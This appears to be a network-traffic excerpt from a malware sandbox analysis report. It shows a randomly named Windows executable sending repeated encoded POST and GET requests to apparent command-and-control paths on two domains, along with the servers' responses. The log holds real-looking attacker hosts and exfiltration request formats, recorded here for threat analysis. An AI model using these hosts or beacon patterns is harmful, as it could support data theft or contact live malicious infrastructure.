                                    Jul 11, 2024 15:06:10.074928045 CEST1236INData Raw: 64 69 75 73 3a 36 70 78 7d 2e 62 67 64 2d 30 32 3a 62 65 66 6f 72 65 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 2c 62 61 63 6b 67 72 6f 75 6e 64 20 2e 32 73 20 65 61 73 65 7d 2e 62 67 64 2d 30 32 3a 68 6f
                                    Data Ascii: dius:6px}.bgd-02:before{transition:opacity .2s ease,background .2s ease}.bgd-02:hover:before{opacity:1}.txt-FFFFFF{color:#fff}.bgd-02.disabled:before,.bgd-02:disabled:before{opacity:1}.bs-2:after{position:absolute;top:0;left:0;width:calc(100%
                                    Jul 11, 2024 15:06:10.082590103 CEST1236INData Raw: 6d 29 22 3b 2d 6d 6f 7a 2d 6f 70 61 63 69 74 79 3a 31 3b 2d 6b 68 74 6d 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 38 35 7b 30 25 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22
                                    Data Ascii: m)";-moz-opacity:1;-khtml-opacity:1;opacity:1}}@keyframes fadein85{0%{-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=$param)";filter:"alpha(opacity=$param)";-moz-opacity:1;-khtml-opacity:1;opacity:1}to{-ms-filter:"progid:DXImageTr


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.649727188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:16.735801935 CEST850OUTPOST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 61 49 6f 68 34 72 58 72 31 64 61 74 2b 78 72 70 51 32 62 41 45 36 72 6c 6b 71 63 57 79 34 43 41 6d 4d 6a 4b 72 54 47 4e 71 55 58 6a 41 61 54 76 50 74 72 64 47 38 38 44 63 45 37 42 41 34 63 35 36 6f 30 77 34 45 33 39 72 4d 43 4e 58 2f 68 38 56 72 31 70 38 67 5a 49 4d 50 2b 43 52 32 65 4e 4f 53 43 41 59 4a 62 5a 50 6e 4a 47 62 73 76 4a 42 5a 71 4e 39 77 43 43 30 66 63 46 70 58 6f 75 30 46 32 33 52 79 53 68 73 4a 2b 35 43 47 6d 37 4e 33 2b 69 6d 75 61 62 7a 42 2f 56 71 4c 45 4b 50 36 46 75 68 37 74 6b 4f 37 64 71 73 69 2f 4b 7a 73 67 35 68 6a 37 64 57 4e 41 69 37 48 37 62
                                    Data Ascii: bB=kt7eE1sXa7IWaIoh4rXr1dat+xrpQ2bAE6rlkqcWy4CAmMjKrTGNqUXjAaTvPtrdG88DcE7BA4c56o0w4E39rMCNX/h8Vr1p8gZIMP+CR2eNOSCAYJbZPnJGbsvJBZqN9wCC0fcFpXou0F23RyShsJ+5CGm7N3+imuabzB/VqLEKP6Fuh7tkO7dqsi/Kzsg5hj7dWNAi7H7b
                                    Jul 11, 2024 15:06:17.938327074 CEST803INHTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:17 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hy4wnMypSvedVQgxRvQcR5TrY8fFoJ5Wcboo1hEYfqBmN9flN6GnKChbpVi%2F8EfzPhq0vX2Gmk0yiXcdmA6yEcGfmbYOZETu8cAUWjXtNv%2B7cnvxinftn0T4xoOkIn%2Fq4JF1SXzCzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190288ff61c43b-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 d4 cc dc c4 c0 c2 c4 52 c9 5a c1 46 1f aa 11 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 47 4d c8 13 94 00 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 93(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1RZFbGM0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.649728188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:19.325665951 CEST874OUTPOST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 71 41 6d 73 54 4b 71 58 79 4e 70 55 58 6a 59 71 54 75 4c 74 72 47 47 38 35 2b 63 42 62 42 41 35 34 35 36 70 6f 77 34 32 66 36 74 63 43 4c 43 50 68 2b 52 72 31 70 38 67 5a 49 4d 50 72 4b 52 32 47 4e 4f 69 79 41 4a 59 62 61 47 48 4a 46 52 4d 76 4a 58 70 71 4a 39 77 43 77 30 65 41 72 70 53 73 75 30 45 71 33 52 6a 53 69 6d 4a 2f 38 4e 6d 6e 37 4e 79 62 4f 71 65 66 33 79 41 66 66 34 35 55 56 4f 4d 45 30 39 49 74 48 63 72 39 6f 73 67 6e 34 7a 4d 67 54 6a 6a 44 64 45 61 4d 46 30 7a 65 34 65 77 79 47 41 61 47 78 7a 64 33 54 43 56 6e 75 30 4a 63 2b 77 41 3d 3d
                                    Data Ascii: bB=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyrqAmsTKqXyNpUXjYqTuLtrGG85+cBbBA5456pow42f6tcCLCPh+Rr1p8gZIMPrKR2GNOiyAJYbaGHJFRMvJXpqJ9wCw0eArpSsu0Eq3RjSimJ/8Nmn7NybOqef3yAff45UVOME09ItHcr9osgn4zMgTjjDdEaMF0ze4ewyGAaGxzd3TCVnu0Jc+wA==
                                    Jul 11, 2024 15:06:19.932529926 CEST793INHTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:19 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zz%2FDBL1HTZumcMfI2y2kabyNW1%2BfDruNsqJWQ0Z4EjfKNWyJxRd8vtx2CBfoTpZoLZH71wTvdQyrgExHcQVv5fkZHVf3k3bdB4yByOpXqeCzHqhaIEJUaoE%2BLQopc9SrJjpxtNOMgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1902993d553354-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 c2 dc cc c0 d2 c2 cc 48 c9 5a c1 46 1f aa 11 00 00 00 ff ff e3 02 00 ad a1 3c 84 94 00 00 00 0d 0a
                                    Data Ascii: 9e(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1HZF<
                                    Jul 11, 2024 15:06:19.933139086 CEST5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.649729188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:21.902606010 CEST1887OUTPOST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 79 41 6d 2f 62 4b 72 32 79 4e 6f 55 58 6a 56 4b 54 72 4c 74 71 65 47 38 41 31 63 42 66 33 41 36 51 35 37 4c 4d 77 2b 43 4c 36 6a 63 43 4c 64 66 68 2f 56 72 30 30 38 67 49 44 4d 50 37 4b 52 32 47 4e 4f 67 71 41 5a 35 62 61 41 48 4a 47 62 73 76 7a 42 5a 72 63 39 77 4b 67 30 65 46 65 70 6d 59 75 31 6b 36 33 64 78 4b 69 67 5a 2f 79 49 6d 6e 56 4e 79 66 52 71 65 54 46 79 41 72 6d 34 35 77 56 44 5a 4a 31 75 36 74 54 4e 59 46 78 2f 7a 53 59 38 59 55 64 72 78 37 63 4a 37 38 72 7a 6a 62 52 58 77 2b 6b 4d 72 53 32 30 64 62 69 4c 51 4b 2f 30 4c 56 6b 6b 51 78 35 61 79 45 33 52 51 75 38 78 6b 68 7a 45 76 73 2b 4c 38 4c 4c 45 34 62 76 6b 78 4d 43 2f 52 6d 73 47 35 48 38 46 34 51 6e 6d 69 68 32 53 63 34 4b 62 6f 4d 48 6a 4b 79 52 37 4c 48 72 73 4b 6a 44 71 75 73 31 45 7a 79 54 57 44 6d 66 38 4a 56 49 4e 67 71 39 6b 50 51 55 32 6e 45 30 65 4f 65 79 43 44 53 6a 47 6f 73 63 35 77 41 [TRUNCATED]
                                    Data Ascii: bB=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyryAm/bKr2yNoUXjVKTrLtqeG8A1cBf3A6Q57LMw+CL6jcCLdfh/Vr008gIDMP7KR2GNOgqAZ5baAHJGbsvzBZrc9wKg0eFepmYu1k63dxKigZ/yImnVNyfRqeTFyArm45wVDZJ1u6tTNYFx/zSY8YUdrx7cJ78rzjbRXw+kMrS20dbiLQK/0LVkkQx5ayE3RQu8xkhzEvs+L8LLE4bvkxMC/RmsG5H8F4Qnmih2Sc4KboMHjKyR7LHrsKjDqus1EzyTWDmf8JVINgq9kPQU2nE0eOeyCDSjGosc5wAlgLYJI0RFgeL+eVOvM+XgTE57YDE6+Q1kFifdBFyz2T5iyyD4G6Vfn1XTHYKS53GAXaV01gJp7CjwH/8IuUUBapjFyZAq7FlBg8i7+dqmHJEf+3WgeA4kE79jfbxkl37nM1HKgI3bGDpz8vhFpuee8412PUV7kxvGV99fT4P8q3T+lh/5b0VANA2L/IEvQLNR3PaJlUpqx5ysqF17nZ7L+eVm0qKwrRveMBvWAa8/c/5aAdptuo5rUFSUQUYhJiKf+osaW9J8MLPjQ74xZAPjQ/Lcqfe/AaXWpg+ajuqaiximlGBjyUvZhA5zgF4DbCEhatZA7xikPs6/pHwhG0ipSLyDGjLjHgPbFYn1bDk8FshX+aWBf/2nJRwG8fCMr8SmegtHd2tEyj2FX9g9x9NEJB2y+5Mo82dJZhbRs7iIeFpmiJqhfe02MvwAfRCU+BF0xTUneNdu3BqHU0tlhCjrMKlaeO3ShWW0kpI9Ix1v9+gD36XpDVHkUik+mGfRKeN74TRRjwqknSOq3siAQwu0xhQmIiq/hTNXocnvUGcfr2Hvo4h3BlruG+oGEzvDDzbfXHbfwU+DNNd47D479NYjjQ6NHxeL2K5+4UQHYQEWTVocPi5DCTCwLXkd+Q/wwZRxs3lYV48sCmBVNERmOBL3+HwulAWEpfduh [TRUNCATED]


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.649730188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:24.480320930 CEST583OUTGET /mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.alphacentura.com
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:25.063030005 CEST922INHTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:25 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvL6%2BsqeJDnXisQVpVxxkB6pvkgHXVZv9SpaAxeAGE55qu9vaQQ4%2B6GgC%2BB65sCUUvxM7PHspFQVJq0tr27bfP5I3pOc4EhofcatfHKTkg3%2BFekUmWyH9tevqdOsfNUuW51blokbMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1902b96e1b4262-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 31 32 39 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 6d 6e 72 37 2f 3f 47 58 3d 69 50 39 78 43 4c 26 62 42 3d 70 76 54 2b 48 42 39 59 52 4b 49 2b 50 4f 51 78 30 62 2f 4d 2f 75 62 67 78 68 71 70 61 45 58 32 42 5a 6a 4a 6b 62 73 4a 7a 61 58 35 6d 64 62 63 69 6e 36 4b 74 32 44 39 58 4f 6a 70 4a 75 76 6c 41 71 38 45 66 56 76 48 55 39 39 5a 2b 49 45 52 35 56 4c 78 75 50 53 69 58 73 68 78 5a 36 77 44 6a 6a 6f 2b 42 75 37 66 51 57 32 41 42 31 2f 55 63 59 43 54 55 51 74 35 66 73 6e 65 51 5a 4b 4d 37 51 72 79 39 37 41 3d 26 62 74 77 61 66 3d 39 34 34 39 32 36 30 30 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 129<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A=&btwaf=94492600"; </script>10


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.649732134.122.138.60806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:32.631654978 CEST850OUTPOST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 71 39 32 67 32 33 45 38 4f 32 6d 2f 6b 4b 77 35 6b 48 4a 62 47 4b 37 6e 4f 50 53 75 7a 33 41 77 47 4b 52 33 61 6b 56 79 43 58 2f 33 77 33 55 51 61 4e 31 35 57 61 75 77 76 54 4d 7a 57 4b 69 38 4d 47 47 4b 30 47 43 33 79 42 48 74 35 47 57 76 59 53 2b 35 41 4d 53 70 4d 4b 6d 6f 56 58 4c 55 48 71 61 4b 4a 77 42 68 75 74 6c 2b 6c 78 66 75 4a 36 32 4d 69 6d 42 6c 34 33 47 33 45 57 78 31 4c 47 30 36 75 39 49 6a 32 59 78 44 43 63 50 77 4f 52 31 4b 44 5a 78 64 50 6f 44 7a 38 52 6e 2b 56 42 62 35 37 73 54 6f 4c 58 43 76 4d 59 68 4d 31 54 43 33 31 59 45 65 63 55 48 51 4c 79 75
                                    Data Ascii: bB=lDpH6KcNafvQsq92g23E8O2m/kKw5kHJbGK7nOPSuz3AwGKR3akVyCX/3w3UQaN15WauwvTMzWKi8MGGK0GC3yBHt5GWvYS+5AMSpMKmoVXLUHqaKJwBhutl+lxfuJ62MimBl43G3EWx1LG06u9Ij2YxDCcPwOR1KDZxdPoDz8Rn+VBb57sToLXCvMYhM1TC31YEecUHQLyu
                                    Jul 11, 2024 15:06:33.405200958 CEST446INHTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:33 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.649733134.122.138.60806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:35.210818052 CEST874OUTPOST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 47 6e 41 77 6e 36 52 32 62 6b 56 6e 43 58 2f 38 51 33 52 64 36 4e 2b 35 57 65 6d 77 76 66 4d 7a 53 71 69 38 49 4b 47 4a 48 75 42 78 69 42 46 6d 5a 47 55 68 34 53 2b 35 41 4d 53 70 49 69 4d 6f 55 7a 4c 54 30 43 61 4b 6f 77 43 69 75 74 69 2f 6c 78 66 6b 5a 36 36 4d 69 6d 7a 6c 38 32 6a 33 48 75 78 31 4a 4f 30 36 37 42 48 73 32 5a 36 64 79 64 74 30 39 73 45 54 7a 4d 64 52 4d 34 52 77 72 6f 41 32 44 41 42 6c 49 73 77 36 62 33 41 76 4f 41 54 4d 56 54 6f 31 31 67 45 4d 4c 59 67 66 2f 58 4e 70 4a 44 6f 49 51 48 30 77 38 2b 36 44 68 32 34 4a 51 49 42 79 41 3d 3d
                                    Data Ascii: bB=lDpH6KcNafvQsO52t33E7u2lzEKwzEHNbGW7nK/CuGnAwn6R2bkVnCX/8Q3Rd6N+5WemwvfMzSqi8IKGJHuBxiBFmZGUh4S+5AMSpIiMoUzLT0CaKowCiuti/lxfkZ66Mimzl82j3Hux1JO067BHs2Z6dydt09sETzMdRM4RwroA2DABlIsw6b3AvOATMVTo11gEMLYgf/XNpJDoIQH0w8+6Dh24JQIByA==
                                    Jul 11, 2024 15:06:36.061991930 CEST446INHTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:35 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.649734134.122.138.60806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:37.773257971 CEST1887OUTPOST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 46 48 41 77 56 79 52 32 34 4d 56 68 79 58 2f 78 77 33 51 64 36 4e 76 35 53 79 69 77 76 44 63 7a 51 53 69 2b 72 43 47 64 69 61 42 34 69 42 46 70 35 47 58 76 59 54 38 35 41 64 5a 70 4d 47 4d 6f 55 7a 4c 54 79 2b 61 4e 35 77 43 6b 75 74 6c 2b 6c 78 44 75 4a 36 65 4d 68 57 4a 6c 38 79 64 30 32 4f 78 37 4a 65 30 38 4a 70 48 68 32 5a 34 63 79 64 4c 30 39 67 66 54 79 67 76 52 4e 38 37 77 73 59 41 6d 31 31 57 2f 4b 59 61 6e 4e 7a 36 34 35 6f 75 4e 52 44 5a 37 32 30 72 45 4a 63 42 41 72 4f 2f 68 50 66 4d 4a 44 72 78 79 2b 47 41 44 57 6e 39 64 54 31 33 6f 56 6a 72 72 57 37 32 4f 37 48 42 30 4d 53 56 47 38 31 4d 49 4f 43 53 34 4f 37 30 48 6d 63 57 67 6c 35 63 57 4a 36 6b 73 42 31 59 48 78 4f 4f 47 52 54 65 45 62 4e 4e 79 55 4f 6d 4c 4c 36 30 63 62 35 61 6f 54 59 43 74 6b 44 42 46 74 6d 32 63 34 48 4b 45 6b 44 64 56 69 51 42 66 72 